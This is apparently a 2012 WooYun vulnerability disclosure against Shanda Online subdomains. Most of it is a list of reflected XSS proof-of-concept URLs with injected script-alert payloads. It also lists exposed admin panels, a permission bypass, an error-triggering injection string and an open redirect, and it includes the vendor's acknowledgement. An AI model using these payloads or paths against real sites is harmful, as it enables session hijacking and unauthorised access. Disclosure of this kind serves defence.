http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx='"><script>alert(6112296);</script><"&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(1535785);</script><"&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType='"><script>alert(6920369);</script><"&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://jf.sdo.com/Partner/PromotionList.aspx?type='"><script>alert(3820307);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString='"><script>alert(6392999);</script><"&idx=11690
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString='"><script>alert(8150974);</script><"&idx=11689
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString=1&idx='"><script>alert(7444296);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString='"><script>alert(7444296);</script><"&idx=11688
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString='"><script>alert(6400969);</script><"&idx=11687
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString='"><script>alert(2856795);</script><"&idx=11695
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString=1&idx='"><script>alert(6953485);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString=1&idx='"><script>alert(8689273);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString='"><script>alert(8689273);</script><"&idx=11693
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString=1&idx='"><script>alert(7152569);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString='"><script>alert(0805996);</script><"&idx=12569
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString=1&idx=';</script><script>alert(0805996);</script>
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString='"><script>alert(2240958);</script><"&idx=11578
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString='"><script>alert(5647584);</script><"&idx=11583
http://ga.abc.sdo.com/knowledge/ClassShow/11584?queryString=1&idx='"><script>alert(9843284);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString=1&idx='"><script>alert(1950983);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString=1&idx='"><script>alert(3686881);</script><"
http://register.sdo.com/gaea/input_pt.aspx?from=121&zone='"><script>alert(6215670);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from='"><script>alert(2192155);</script><"&zone=nav
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone='"><script>alert(0314432);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType='"><script>alert(9646418);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid='"><script>alert(8079841);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid='"><script>alert(1210537);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001='"><script>alert(2465525);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(9923001);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(5280583);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(3117847);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(2649984);</script><"&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(9053711);</script><"&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(7347684);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid='"><script>alert(4972556);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype='"><script>alert(5027418);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner='"><script>alert(2585428);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype='"><script>alert(4100227);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1049614);</script><"&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3785412);</script><"&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(2769998);</script><"&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(9116294);</script><"&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection='"><script>alert(6583770);</script><"
http://cy.sdo.com/bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString='"><script>alert(0513467);</script><"&idx=13045
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString='"><script>alert(3721571);</script><"&idx=13046
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString='"><script>alert(0426668);</script><"&idx=13047
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString='"><script>alert(2149265);</script><"&idx=13048
http://ws.abc.sdo.com/knowledge/ClassShow/13045?queryString=1&idx='"><script>alert(2149265);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString='"><script>alert(5355054);</script><"&idx=13049
http://ws.abc.sdo.com/knowledge/ClassShow/13047?queryString=1&idx='"><script>alert(8551854);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13046?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13048?queryString=1&idx='"><script>alert(4964253);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13049?queryString=1&idx='"><script>alert(7809430);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString='"><script>alert(0876530);</script><"&idx=13063
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString='"><script>alert(3393352);</script><"&idx=13064
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString='"><script>alert(9668415);</script><"&idx=13068
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString='"><script>alert(1802440);</script><"&idx=13070
http://ws.abc.sdo.com/knowledge/ClassShow/13063?queryString=1&idx='"><script>alert(1802440);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13064?queryString=1&idx='"><script>alert(5912402);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString='"><script>alert(5912402);</script><"&idx=13072
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString='"><script>alert(7535048);</script><"&idx=13067
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString='"><script>alert(2957539);</script><"&idx=13071
http://ws.abc.sdo.com/knowledge/ClassShow/13068?queryString=1&idx='"><script>alert(6642383);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13072?queryString=1&idx='"><script>alert(1376727);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString='"><script>alert(4583426);</script><"&idx=13089
http://ws.abc.sdo.com/knowledge/ClassShow/13067?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString='"><script>alert(4583426);</script><"&idx=13093
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString='"><script>alert(4583426);</script><"&idx=13091
http://ws.abc.sdo.com/knowledge/ClassShow/13071?queryString=1&idx='"><script>alert(4583426);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString='"><script>alert(0869258);</script><"&idx=13092
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString='"><script>alert(3252579);</script><"&idx=13088
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString='"><script>alert(3252579);</script><"&idx=13094
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString='"><script>alert(3252579);</script><"&idx=13090
http://ws.abc.sdo.com/knowledge/ClassShow/13089?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13091?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13093?queryString=1&idx='"><script>alert(3059254);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString='"><script>alert(2412714);</script><"&idx=13095
http://ws.abc.sdo.com/knowledge/ClassShow/13092?queryString=1&idx='"><script>alert(2412714);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13088?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13090?queryString=1&idx='"><script>alert(5618414);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13094?queryString=1&idx='"><script>alert(9834013);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString='"><script>alert(1940913);</script><"&idx=13085
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString='"><script>alert(4148512);</script><"&idx=13087
http://ws.abc.sdo.com/knowledge/ClassShow/13070?queryString=1&idx='"><script>alert(4148512);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13095?queryString=1&idx='"><script>alert(7253211);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString='"><script>alert(7253211);</script><"&idx=13082
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString='"><script>alert(7253211);</script><"&idx=13080
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString='"><script>alert(3677700);</script><"&idx=13078
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString='"><script>alert(3677700);</script><"&idx=13083
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString='"><script>alert(6772400);</script><"&idx=13079
http://ws.abc.sdo.com/knowledge/ClassShow/13085?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13087?queryString=1&idx='"><script>alert(6772400);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString='"><script>alert(9989100);</script><"&idx=13075
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString='"><script>alert(9989100);</script><"&idx=13076
http://ws.abc.sdo.com/knowledge/ClassShow/13082?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13080?queryString=1&idx='"><script>alert(2086900);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13078?queryString=1&idx='"><script>alert(8398393);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString='"><script>alert(8398393);</script><"&idx=12545
http://ws.abc.sdo.com/knowledge/ClassShow/13076?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13075?queryString=1&idx='"><script>alert(0505096);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString='"><script>alert(4711708);</script><"&idx=12548
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString='"><script>alert(5192521);</script><"&idx=13077
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString='"><script>alert(7818584);</script><"&idx=12554
http://ws.abc.sdo.com/knowledge/ClassShow/12545?queryString=1&idx='"><script>alert(2417275);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString='"><script>alert(2417275);</script><"&idx=12549
http://ws.abc.sdo.com/knowledge/ClassShow/13079?queryString=1&idx='"><script>alert(6237560);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13083?queryString=1&idx='"><script>alert(9544396);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString='"><script>alert(1659680);</script><"&idx=12555
http://ws.abc.sdo.com/knowledge/ClassShow/13077?queryString=1&idx='"><script>alert(1659680);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12554?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12548?queryString=1&idx='"><script>alert(8625956);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString='"><script>alert(8625956);</script><"&idx=13074
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString='"><script>alert(0069195);</script><"&idx=12556
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString='"><script>alert(7391693);</script><"&idx=13052
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString='"><script>alert(6993830);</script><"&idx=13058
http://ws.abc.sdo.com/knowledge/ClassShow/13074?queryString=1&idx='"><script>alert(2748299);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString='"><script>alert(5808828);</script><"&idx=13056
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString='"><script>alert(5808828);</script><"&idx=13055
http://ws.abc.sdo.com/knowledge/ClassShow/13052?queryString=1&idx='"><script>alert(9008591);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString='"><script>alert(9008591);</script><"&idx=13057
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString='"><script>alert(9008591);</script><"&idx=13060
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString='"><script>alert(1104182);</script><"&idx=13061
http://ws.abc.sdo.com/knowledge/ClassShow/13058?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString='"><script>alert(4328142);</script><"&idx=13062
http://ws.abc.sdo.com/knowledge/ClassShow/12556?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12555?queryString=1&idx='"><script>alert(8527681);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13056?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]='"><script>alert(0633370);</script><"&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13055?queryString=1&idx='"><script>alert(0633370);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13061?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13057?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13060?queryString=1&idx='"><script>alert(3831715);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/12549?queryString=1&idx='"><script>alert(4328142);</script><"
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString='"><script>alert(6468769);</script><"&idx=13059
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]='"><script>alert(5475785);</script><"&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13062?queryString=1&idx='"><script>alert(1788377);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle='"><script>alert(1756743);</script><"&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://ws.abc.sdo.com/knowledge/ClassShow/13059?queryString=1&idx='"><script>alert(8671678);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID='"><script>alert(1922464);</script><"&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString='"><script>alert(0341653);</script><"&idx=11997
http://2c.abc.sdo.com/knowledge/ClassShow/11997?queryString=1&idx='"><script>alert(7655439);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType='"><script>alert(7655439);</script><"&hidReference=&originalReferenceMedia=
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString='"><script>alert(9616427);</script><"&idx=12000
http://2c.abc.sdo.com/knowledge/ClassShow/12000?queryString=1&idx='"><script>alert(8834649);</script><"
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=';</script><script>alert(3012439);</script>&originalReferenceMedia=
http://ws.abc.sdo.com/edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia=';</script><script>alert(7373225);</script>
http://gui.sdo.com/admin/
http://kk.sdo.com/admin/
http://cy.sdo.com/200909/admin/ 这个我知道你们下线了，但是迟迟不把他下线，所以还是发出来！
还有上传页面比较多，我就不一一去看了。
http://in.sdo.com/wp-login.php  盛大创新学院
http://image.help.sdo.com/index.php 图片管理系统
http://icamp.sdo.com/manage/  权限绕过。嘎嘎
报错
http://bb.sdo.com/search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook
url跳转
http://sndasdopassport.sdo.com/sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org

修复方案：

过滤，加强管理体系。
增强密码强度，限制后台权限。
盛大童鞋很给力，我就不说了。
QQ2036234 你们懂的。

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2012-05-25 14:41

厂商回复：

感谢反馈，这次zeracker很给力，我们内部已经在处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07510

漏洞标题：盛大在线漏洞集合已拿到webshell，不方便进一步提权。

相关厂商：盛大在线

漏洞作者： zeracker

提交时间：2012-05-25 05:03

修复时间：2012-07-09 05:04

公开时间：2012-07-09 05:04

漏洞类型：账户体系控制不严

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07510

漏洞标题：盛大在线漏洞集合已拿到webshell，不方便进一步提权。

相关厂商：盛大在线

漏洞作者： zeracker

提交时间：2012-05-25 05:03

修复时间：2012-07-09 05:04

公开时间：2012-07-09 05:04

漏洞类型：账户体系控制不严

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-07510"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：